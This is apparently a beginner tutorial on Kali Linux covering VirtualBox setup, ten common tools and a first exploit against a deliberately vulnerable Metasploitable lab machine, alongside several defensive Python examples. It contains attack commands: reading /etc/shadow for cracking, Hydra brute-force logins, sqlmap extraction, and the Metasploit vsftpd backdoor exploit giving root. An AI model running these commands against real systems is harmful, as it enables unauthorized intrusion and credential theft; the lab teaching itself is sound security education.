Kali Linux for Beginners: Setup, Tools, and First Hack

Learn Kali Linux from scratch with this beginner tutorial. Install on VirtualBox, explore the top 10 tools, and run your first penetration test on Metasploitable.
- Offense
- Pentesting
- Skills
- Mindset
- Confidence
TL;DR
Kali Linux is the industry standard penetration testing distribution, preloaded with over 600 security tools used by ethical hackers and security professionals worldwide. This tutorial walks beginners through installing Kali on VirtualBox, navigating the desktop environment, understanding the top 10 essential tools, and completing a first practical exercise scanning a Metasploitable virtual machine. No prior Linux experience is required, just curiosity and a willingness to learn by doing.
It was the night before her university's first Capture the Flag competition, and Priya had a problem. She had studied networking theory for months, memorized the OSI model, and could recite firewall rules from memory. But she had never actually scanned a network, never intercepted a packet, never exploited a vulnerable service. Her teammate handed her a USB drive and said, "Boot into this. It has everything you need."
That USB drive contained Kali Linux. Within two hours, Priya had discovered open ports on the practice server, identified a misconfigured web application, and used a SQL injection to capture her first flag. She placed third in the competition the next day. Not because she suddenly became an expert overnight, but because Kali gave her the tools to turn theory into practice.
That transformation, from knowing about security to actually doing security, is what Kali Linux enables. And it starts with getting it installed.
What Is Kali Linux and Why It Matters
Kali Linux is a Debian-based Linux distribution designed specifically for penetration testing, security research, and digital forensics. Maintained by OffSec (the organization behind the OSCP certification), Kali ships with over 600 preinstalled security tools organized into categories: information gathering, vulnerability analysis, web application testing, password attacks, wireless attacks, exploitation, and forensics.
What makes Kali different from installing individual tools on Ubuntu or Fedora is integration. Every tool is preconfigured, dependencies are resolved, and the entire system is built around the workflow of a security professional. The kernel includes patches for wireless injection. The repositories contain tool versions tested for compatibility. The default user environment is configured for penetration testing, not desktop productivity.
Over 80% of professional penetration testers use Kali as their primary testing distribution. When job postings mention "proficiency with industry standard security tools," they are almost always referring to tools that ship with Kali. When certification exams like the OSCP hand you a testing environment, it runs Kali.
This is not a toy. It is a professional toolkit. And it is completely free.
Installing Kali Linux on VirtualBox
Running Kali inside a virtual machine is the safest and most practical approach for beginners. You keep your main operating system intact, you can take snapshots before risky experiments, and you can delete the entire environment and start fresh if something goes wrong.
Step 1: Download and Install VirtualBox
Download VirtualBox from virtualbox.org. Choose the package for your host operating system (Windows, macOS, or Linux) and follow the installer. Accept the default settings. The installation takes about five minutes.
Step 2: Download the Kali Linux Image
Visit kali.org/get-kali and download the prebuilt VirtualBox image. This is a .ova file that contains a fully configured Kali installation. The download is approximately 3.5 GB.
Using the prebuilt image instead of the ISO installer saves significant time. The OVA comes with VirtualBox Guest Additions already installed, which means shared clipboard, drag and drop file transfer, and automatic screen resizing work immediately.
Step 3: Import the Image
Open VirtualBox, click File > Import Appliance, select the downloaded .ova file, and click Import. Before starting the machine, adjust these settings:
System > Motherboard > Base Memory: 4096 MB (minimum 2048)
System > Processor > CPU: 2 cores
Display > Screen > Video Memory: 128 MB
Network > Adapter 1 > Attached to: NAT
The NAT network setting gives your Kali VM internet access through your host machine while keeping it isolated from your local network. This is important for safe experimentation.
Step 4: First Boot
Start the virtual machine. Kali boots to a login screen. The default credentials for the prebuilt image are:
Username: kali
Password: kali
After logging in, open a terminal (the black rectangle icon in the taskbar) and update the system:
sudo apt update && sudo apt upgrade -y
This ensures all tools are at their latest versions. The update can take 10 to 20 minutes depending on your internet connection.
Navigating the Kali Desktop
Kali uses the Xfce desktop environment by default. It is lightweight and fast, which matters when you are running inside a VM. The key elements are:
The top panel contains the Applications menu (organized by security category), workspace switcher, and system tray. The bottom panel shows your open windows. The desktop is intentionally minimal because most work happens in the terminal.
Open the Applications menu and explore the categories. 01 Information Gathering contains reconnaissance tools. 05 Password Attacks holds cracking utilities. 09 Sniffing & Spoofing includes network interception tools. This organization matches the phases of a penetration test, from reconnaissance through exploitation to reporting.
The file manager, web browser (Firefox ESR), and text editor (Mousepad) are under the Usual Applications category. You will use Firefox frequently for web application testing alongside Burp Suite.
The Top 10 Kali Linux Tools Every Beginner Should Know
Kali ships with hundreds of tools, but mastering these ten covers the fundamentals of ethical hacking. Each one maps to a specific phase of a penetration test.
1. Nmap (Network Mapper)
Nmap is the single most important reconnaissance tool in cybersecurity. It discovers hosts on a network, identifies open ports, detects running services and their versions, and even fingerprints operating systems.
# Basic scan of a target
nmap 192.168.1.100
# Service version detection
nmap -sV 192.168.1.100
# Operating system detection (requires root)
sudo nmap -O 192.168.1.100
# Aggressive scan: OS detection, version, scripts, traceroute
sudo nmap -A 192.168.1.100
Nmap can scan all 65,535 TCP ports on a local network target in under 60 seconds using SYN scan mode (-sS). It is the first tool you run on every engagement because you cannot attack what you cannot see.
2. Burp Suite (Web Application Testing)
Burp Suite is an intercepting proxy that sits between your browser and a web application. It captures every HTTP request and response, letting you inspect, modify, and replay traffic. The Community Edition is preinstalled on Kali.
Launch it from Applications > 03 Web Application Analysis > Burp Suite. Configure Firefox to route traffic through Burp's proxy (127.0.0.1:8080), and every web request becomes visible and editable. This is how you find SQL injection, cross-site scripting, and authentication bypasses in web applications.
3. Metasploit Framework
Metasploit is the world's most widely used exploitation framework. It contains a database of known exploits for operating systems, services, and applications. You select a target vulnerability, configure the exploit, choose a payload (the code that runs after exploitation), and execute.
# Launch the Metasploit console
msfconsole
# Search for exploits targeting a specific service
search vsftpd
# Use an exploit
use exploit/unix/ftp/vsftpd_234_backdoor
# Set the target
set RHOSTS 192.168.1.100
# Execute
exploit
Metasploit transforms theoretical vulnerabilities into demonstrated impact. When a client asks "how bad is this vulnerability really?" Metasploit provides the answer.
4. John the Ripper (Password Cracking)
John the Ripper cracks password hashes using dictionary attacks, brute force, and hybrid methods. When you extract password hashes from a compromised system, John determines the original passwords.
# Crack Linux shadow file hashes
sudo unshadow /etc/passwd /etc/shadow > hashes.txt
john hashes.txt
# Use a specific wordlist
john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt
# Show cracked passwords
john --show hashes.txt
The rockyou.txt wordlist ships with Kali and contains over 14 million real passwords from a 2009 data breach. It cracks a surprising percentage of passwords in most engagements, which is exactly why strong password policies matter.
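The same wordlist that makes John effective is equally useful on the defensive side: checked at password-set time, it rejects exactly the passwords John would crack in seconds. The following is an added example, not code from the article, of such a blocklist check in Python. The six-entry wordlist is a constructed stand-in for rockyou.txt, and the normalise() rules that undo common mangling (trailing digits, leet substitutions) are this example's own approximation of what John's rule engine tries in the forward direction.

```python
import re

# Constructed stand-in for a breached-password list such as rockyou.txt
# (the real file has over 14 million lines).
BREACHED_WORDLIST = """password
123456
qwerty
letmein
sunshine
iloveyou
"""

# Reverse of the leet substitutions crackers try first: "p@ssw0rd" -> "password".
LEET_MAP = str.maketrans({"@": "a", "0": "o", "1": "i", "3": "e", "$": "s", "4": "a"})


def load_wordlist(text):
    """Load one password per line into a lowercase set, skipping blank lines."""
    return {line.strip().lower() for line in text.splitlines() if line.strip()}


def normalise(password):
    """Undo the cheap mangling users apply to dictionary words.

    "Password2024!" -> "password", "P@ssw0rd1" -> "password".
    A cracker's rule engine applies these transformations forwards, so a
    candidate whose normalised form is in the list falls almost immediately.
    """
    base = password.lower()
    base = re.sub(r"[\d\W_]+$", "", base)   # strip trailing digits/punctuation
    base = re.sub(r"^[\W_]+", "", base)      # strip leading punctuation
    return base.translate(LEET_MAP)


def check_password(password, wordlist, min_length=12):
    """Return a list of policy findings; an empty list means acceptable."""
    findings = []
    if len(password) < min_length:
        findings.append(f"shorter than {min_length} characters")
    if password.lower() in wordlist:
        findings.append("appears verbatim in a breached-password list")
    else:
        base = normalise(password)
        if base in wordlist:
            findings.append(f"is a trivially mangled form of the breached password '{base}'")
    return findings


if __name__ == "__main__":
    wordlist = load_wordlist(BREACHED_WORDLIST)
    for candidate in ("password", "P@ssw0rd2024!", "correct horse battery staple"):
        print(f"{candidate!r}: {check_password(candidate, wordlist) or 'ok'}")
```

The order in normalise() matters: trailing digits are stripped before the leet map is applied, so that "1" is only read as "i" when it sits inside the word, not as a trailing year or counter.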
5. Aircrack-ng (Wireless Auditing)
Aircrack-ng is a suite of tools for testing wireless network security. It captures wireless traffic, deauthenticates clients to force handshake capture, and cracks WPA/WPA2 keys through dictionary attacks. Wireless testing requires a compatible wireless adapter that supports monitor mode and packet injection.
6. SQLMap (SQL Injection Automation)
SQLMap automates the detection and exploitation of SQL injection flaws. Point it at a URL with parameters, and it tests for injection, identifies the database type, and can extract tables, columns, and data.
# Test a URL parameter for SQL injection
sqlmap -u "http://target.com/page?id=1" --dbs
# Enumerate tables in a specific database
sqlmap -u "http://target.com/page?id=1" -D database_name --tables
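To see what SQLMap is probing for, it helps to look at the flaw from the code side. The following is an added example, not from the article, that builds a constructed users table in an in-memory SQLite database and shows the vulnerable string-concatenation pattern next to the parameterized query that fixes it. The table contents and function names are this example's own.

```python
import sqlite3


def build_db():
    """Create an in-memory database with a constructed users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, role TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [(1, "alice", "user"), (2, "bob", "user"), (3, "carol", "admin")],
    )
    conn.commit()
    return conn


def lookup_vulnerable(conn, user_id):
    """VULNERABLE: the request parameter is pasted into the SQL text.

    Input such as "1 OR 1=1" changes the query's logic instead of being
    treated as a value; this is the class of flaw SQLMap's boolean-based
    tests detect automatically.
    """
    query = f"SELECT id, name, role FROM users WHERE id = {user_id}"
    return conn.execute(query).fetchall()


def lookup_safe(conn, user_id):
    """FIXED: a bound parameter is always a value, never SQL, whatever it contains."""
    query = "SELECT id, name, role FROM users WHERE id = ?"
    return conn.execute(query, (user_id,)).fetchall()


if __name__ == "__main__":
    db = build_db()
    print("normal input, vulnerable:", lookup_vulnerable(db, "1"))
    print("injected input, vulnerable:", lookup_vulnerable(db, "1 OR 1=1"))
    print("injected input, safe:", lookup_safe(db, "1 OR 1=1"))
```

With the parameterized query the injected string is compared against the id column as a whole and simply matches nothing; with the concatenated query it rewrites the WHERE clause and returns every row.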
7. Hydra (Online Password Attacks)
Hydra performs online brute force attacks against network services: SSH, FTP, HTTP, SMB, RDP, and dozens more. Unlike John the Ripper, which cracks hashes offline, Hydra makes actual login attempts against live services.
# Brute force SSH login
hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://192.168.1.100
# Brute force web login form
hydra -l admin -P passwords.txt 192.168.1.100 http-post-form \
"/login:user=^USER^&pass=^PASS^:Invalid credentials"
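Because Hydra works against live services, every attempt leaves a trace in the target's authentication log, which is what a defender watches for. The following is an added example, not code from the article, that parses sshd "Failed password" lines from a constructed syslog excerpt and flags any source address exceeding a threshold of failures inside a sliding time window. The log lines, host name and addresses are constructed for this example; the message format is the one OpenSSH writes to the system log.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample of /var/log/auth.log: one source hammering "admin",
# one legitimate user who mistyped once, and one slow, spread-out probe.
SAMPLE_LOG = """\
Mar  3 10:15:01 kali-lab sshd[1201]: Failed password for invalid user admin from 10.0.2.15 port 40212 ssh2
Mar  3 10:15:01 kali-lab sshd[1202]: Failed password for admin from 10.0.2.15 port 40213 ssh2
Mar  3 10:15:02 kali-lab sshd[1203]: Failed password for admin from 10.0.2.15 port 40214 ssh2
Mar  3 10:15:02 kali-lab sshd[1204]: Failed password for admin from 10.0.2.15 port 40215 ssh2
Mar  3 10:15:03 kali-lab sshd[1205]: Failed password for admin from 10.0.2.15 port 40216 ssh2
Mar  3 10:15:03 kali-lab sshd[1206]: Failed password for admin from 10.0.2.15 port 40217 ssh2
Mar  3 10:15:20 kali-lab sshd[1210]: Failed password for msfadmin from 10.0.2.7 port 50001 ssh2
Mar  3 10:15:31 kali-lab sshd[1211]: Accepted password for msfadmin from 10.0.2.7 port 50002 ssh2
Mar  3 10:25:00 kali-lab sshd[1220]: Failed password for root from 10.0.2.9 port 61000 ssh2
Mar  3 10:40:00 kali-lab sshd[1221]: Failed password for root from 10.0.2.9 port 61001 ssh2
"""

FAILED_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"Failed password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\d{1,3}(?:\.\d{1,3}){3}) port \d+"
)


def parse_failures(log_text, year=2024):
    """Return (timestamp, source_ip, username) for each failed login, oldest first.

    Syslog timestamps carry no year, so one is supplied by the caller.
    """
    events = []
    for line in log_text.splitlines():
        m = FAILED_RE.match(line)
        if not m:
            continue
        stamp = " ".join(m["ts"].split())  # collapse the day-padding double space
        ts = datetime.strptime(f"{year} {stamp}", "%Y %b %d %H:%M:%S")
        events.append((ts, m["ip"], m["user"]))
    events.sort(key=lambda e: e[0])
    return events


def detect_bruteforce(log_text, threshold=5, window_seconds=60, year=2024):
    """Flag sources with >= threshold failures inside any window_seconds span."""
    by_ip = defaultdict(list)
    for ts, ip, user in parse_failures(log_text, year):
        by_ip[ip].append((ts, user))

    alerts = {}
    for ip, fails in by_ip.items():
        start = 0
        for end in range(len(fails)):
            # advance the window start until it fits inside window_seconds
            while (fails[end][0] - fails[start][0]).total_seconds() > window_seconds:
                start += 1
            if end - start + 1 >= threshold:
                alerts[ip] = {
                    "failures": len(fails),
                    "users": sorted({u for _, u in fails}),
                    "first_seen": fails[0][0].isoformat(),
                }
                break
    return alerts


if __name__ == "__main__":
    for ip, info in detect_bruteforce(SAMPLE_LOG).items():
        print(f"ALERT {ip}: {info['failures']} failures, users={info['users']}")
```

The threshold and window are the tunable part: a low threshold over a long window catches the slow "password spraying" style in the last two lines, at the cost of more false positives from users who simply forget their password.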
8. Wireshark (Packet Analysis)
Wireshark captures and analyzes network traffic at the packet level. It shows you exactly what data traverses the network: DNS queries, HTTP requests, authentication attempts, and file transfers. In Kali, it integrates with other tools to provide visibility into what your attacks look like on the wire.
9. Nikto (Web Server Scanner)
Nikto scans web servers for known vulnerabilities, misconfigurations, and outdated software. It checks for dangerous files, default installations, and insecure server headers.
# Scan a web server
nikto -h http://192.168.1.100
Nikto is loud. It generates hundreds of requests and is easily detected by intrusion detection systems. That makes it unsuitable for stealth engagements but excellent for comprehensive vulnerability discovery in authorized tests.
10. Gobuster (Directory Brute Forcing)
Gobuster discovers hidden directories and files on web servers by brute forcing paths using a wordlist. Web applications often contain admin panels, backup files, configuration endpoints, and development artifacts that are not linked from the public interface but are still accessible.
# Enumerate directories
gobuster dir -u http://192.168.1.100 -w /usr/share/wordlists/dirb/common.txt
# Enumerate with file extensions
gobuster dir -u http://192.168.1.100 -w /usr/share/wordlists/dirb/common.txt -x php,html,txt
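The files Nikto and Gobuster turn up (backup copies, editor leftovers, version-control directories, database dumps) are cheaper to find from the inside than from the outside. The following is an added example, not code from the article, that walks a web root and reports the artifacts a wordlist scan would expose, so they can be removed before deployment. The pattern lists are this example's own starting point, not an exhaustive catalogue, and the sample web root is constructed in a temporary directory.

```python
import tempfile
from pathlib import Path

# Example patterns for artifacts that directory brute-forcing routinely finds.
# Extend these to match your own stack.
RISKY_SUFFIXES = (".bak", ".old", ".orig", ".swp", "~", ".sql", ".zip", ".tar.gz", ".log")
RISKY_NAMES = {".git", ".svn", ".env", ".htpasswd", "phpinfo.php", ".DS_Store"}
RISKY_DIRS = {"backup", "backups", "old", "tmp", "test", "admin"}


def audit_docroot(docroot):
    """Return sorted (relative_path, reason) pairs for everything that needs review."""
    root = Path(docroot)
    findings = []
    for path in root.rglob("*"):  # pathlib globbing includes dotfiles
        rel = path.relative_to(root).as_posix()
        name = path.name
        if path.is_dir():
            if name in RISKY_NAMES:
                findings.append((rel + "/", "metadata directory that must not be web-exposed"))
            elif name in RISKY_DIRS:
                findings.append((rel + "/", "directory to remove or access-control"))
            continue
        if name in RISKY_NAMES:
            findings.append((rel, "sensitive file"))
        elif name.endswith(RISKY_SUFFIXES):
            findings.append((rel, "backup/editor/archive artifact"))
    return sorted(findings)


def build_sample_docroot():
    """Create a throwaway web root populated with constructed sample files."""
    root = Path(tempfile.mkdtemp(prefix="docroot-"))
    files = {
        "index.html": "<h1>Home</h1>",
        "about.html": "<h1>About</h1>",
        "images/logo.png": "",
        "config.php": "<?php $db_pass = 'example'; ?>",
        "config.php.bak": "<?php $db_pass = 'example'; ?>",  # backup copy left behind
        "index.html~": "<h1>Home</h1>",                        # editor backup file
        "backup/site.sql": "-- constructed dump",
        ".git/HEAD": "ref: refs/heads/main",
    }
    for rel, content in files.items():
        target = root / rel
        target.parent.mkdir(parents=True, exist_ok=True)
        target.write_text(content)
    return str(root)


if __name__ == "__main__":
    for rel, reason in audit_docroot(build_sample_docroot()):
        print(f"{rel:20} {reason}")
```

Run against a real web root, the same function gives you the list Gobuster would hand an attacker, minus the guessing; anything it reports should either be deleted or moved outside the served directory.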
Your First Practical Exercise: Scanning Metasploitable
Theory only goes so far. The fastest way to learn Kali is to use it against a system designed to be hacked. Metasploitable 2 is a deliberately vulnerable Linux virtual machine created by Rapid7. It contains over 30 misconfigured services, weak passwords, and exploitable applications, all in a safe, isolated environment.
Setting Up Metasploitable
Download Metasploitable 2 from VulnHub or SourceForge. It comes as a .vmdk file. Create a new VM in VirtualBox:
- Click New, name it "Metasploitable", select Linux / Ubuntu (64-bit)
- Assign 512 MB RAM (it needs very little)
- Select Use an existing virtual hard disk file and choose the downloaded .vmdk
- Before starting, change the network adapter to Host-only Adapter
Change your Kali VM's network adapter to the same Host-only Adapter. This creates an isolated network where both machines can communicate without exposing Metasploitable to the internet. Never connect Metasploitable to a real network. Its vulnerabilities are intentional and severe.
Boot Metasploitable (login: msfadmin / msfadmin) and note its IP address:
ifconfig
Running Your First Scan
Back in your Kali terminal, start with host discovery to confirm you can reach the target:
ping -c 4 <metasploitable-ip>
Now run a comprehensive Nmap scan:
sudo nmap -sV -sC -O <metasploitable-ip>
The flags mean: -sV detects service versions, -sC runs default NSE scripts for additional enumeration, and -O attempts operating system fingerprinting. The output will reveal dozens of open ports and running services:
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.3.4
22/tcp   open  ssh         OpenSSH 4.7p1
23/tcp   open  telnet      Linux telnetd
80/tcp   open  http        Apache httpd 2.2.8
445/tcp  open  netbios-ssn Samba smbd 3.X
3306/tcp open  mysql       MySQL 5.0.51a
...
Each open port represents an attack surface. The vsftpd 2.3.4 version is particularly notable because it contains a famous backdoor vulnerability. The outdated versions of SSH, Apache, and MySQL all have known exploits.
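On a real engagement the scan output above becomes an inventory that you triage rather than a page you read once. The following is an added example, not code from the article, that parses Nmap's normal-output port table (the excerpt above, reused here as constructed input) into records and annotates each service with simple, explainable reasons: cleartext protocols and a watchlist of version strings. The watchlist holds only the vsftpd 2.3.4 entry the article discusses; it is an example structure, not a vulnerability database.

```python
import re

# The port table from the scan above, used as constructed input.
SAMPLE_SCAN = """\
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.3.4
22/tcp   open  ssh         OpenSSH 4.7p1
23/tcp   open  telnet      Linux telnetd
80/tcp   open  http        Apache httpd 2.2.8
445/tcp  open  netbios-ssn Samba smbd 3.X
3306/tcp open  mysql       MySQL 5.0.51a
"""

PORT_RE = re.compile(
    r"^(?P<port>\d+)/(?P<proto>tcp|udp)\s+(?P<state>\S+)\s+(?P<service>\S+)"
    r"(?:\s+(?P<version>.*))?$"
)

# Services that carry credentials or content without encryption.
CLEARTEXT_SERVICES = {"ftp", "telnet", "http"}

# Example watchlist keyed on a version substring; the one entry is the
# backdoored release discussed in the article.
WATCHLIST = {"vsftpd 2.3.4": "release known to contain a backdoor"}


def parse_nmap(text):
    """Return a dict per open port: port, proto, service, version."""
    services = []
    for line in text.splitlines():
        m = PORT_RE.match(line.strip())
        if not m or m["state"] != "open":
            continue  # header line, closed/filtered ports, trailing "..."
        services.append({
            "port": int(m["port"]),
            "proto": m["proto"],
            "service": m["service"],
            "version": (m["version"] or "").strip(),
        })
    return services


def triage(services):
    """Map port -> list of reasons the service deserves attention first."""
    notes = {}
    for svc in services:
        reasons = []
        if svc["service"] in CLEARTEXT_SERVICES:
            reasons.append("cleartext protocol")
        for needle, why in WATCHLIST.items():
            if needle in svc["version"]:
                reasons.append(why)
        if reasons:
            notes[svc["port"]] = reasons
    return notes


if __name__ == "__main__":
    found = parse_nmap(SAMPLE_SCAN)
    for port, reasons in triage(found).items():
        print(f"{port}/tcp: {', '.join(reasons)}")
```

The same parser works on any `nmap -sV` output saved with `-oN`; the point of the watchlist structure is that each flag carries a reason you can put in a report, which is what separates a finding from a port number.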
Exploring the Vulnerable Web Application
Open Firefox in Kali and navigate to http://<metasploitable-ip>. You will see a page listing several intentionally vulnerable web applications, including DVWA (Damn Vulnerable Web Application), Mutillidae, and TWiki.
Run Nikto against the web server:
nikto -h http://<metasploitable-ip>
Then use Gobuster to find hidden directories:
gobuster dir -u http://<metasploitable-ip> -w /usr/share/wordlists/dirb/common.txt
Compare what Gobuster finds with what is linked on the main page. You will likely discover directories and files that were not publicly listed. This is the core value of directory brute forcing: finding what developers intended to hide but failed to protect.
Attempting Your First Exploit
With the Nmap results showing vsftpd 2.3.4 on port 21, launch Metasploit:
msfconsole
Search for a known exploit:
search vsftpd
Metasploit will return the exploit/unix/ftp/vsftpd_234_backdoor module. This exploit targets a backdoor that was inserted into the vsftpd 2.3.4 source code in 2011. Configure and run it:
use exploit/unix/ftp/vsftpd_234_backdoor
set RHOSTS <metasploitable-ip>
exploit
If the exploit succeeds, you will have a command shell on the target system. Type whoami and you will see root. You just achieved full system compromise on your first target. Take a moment to appreciate what happened: you identified a service, found a known vulnerability, selected an exploit, and gained unauthorized access. This is what penetration testers do professionally, except they do it with authorization and then help organizations fix the weaknesses they discover.
Building Your Practice Lab
Metasploitable is just the beginning. Once you are comfortable with basic scanning and exploitation, expand your lab with additional vulnerable machines from VulnHub. Start with machines rated "Easy" and work your way up. Each machine teaches different skills: web application exploitation, privilege escalation, password cracking, or network pivoting.
Your practice lab should always be isolated on a host-only network. Never connect intentionally vulnerable machines to your home network or the internet. The vulnerabilities are real, and an exposed Metasploitable machine will be compromised by automated scanners within minutes.
From Lab to Career
Kali Linux is a means, not an end. The tools teach you offensive security thinking: how attackers find weaknesses, chain exploits, and move through networks. That knowledge is valuable whether you end up on the offensive side (penetration testing, red teaming) or the defensive side (SOC analysis, incident response, network security).
The path from your first Nmap scan to a career in cybersecurity follows a pattern. Master the basics in your home lab. Document your learning through write-ups and blog posts. Pursue structured training that fills knowledge gaps. Earn certifications that validate your skills. The OSCP from OffSec, which tests candidates in a 24 hour practical exam using Kali Linux tools, is widely regarded as the gold standard for penetration testers.
Every professional pentester remembers the moment their first exploit succeeded. The moment the terminal returned root@metasploitable. That mix of excitement and "wait, it was that easy?" is exactly the feeling that drives people to dedicate their careers to finding and fixing these weaknesses before malicious actors do.
Your Kali VM is waiting. Open it. Scan something. Break something. Then figure out how to defend against what you just did. That is how cybersecurity professionals are made.
Daute built Unihackers after a decade defending airlines, managed SOCs and international organisations. He is an Associate C|CISO and a regular voice on AI and cybersecurity in international media. Silver Winner at the 2021 Cyber Security Excellence Awards. He teaches the way he wishes someone had taught him: skip the noise, train on what attackers actually do, and graduate people who are useful from day one.

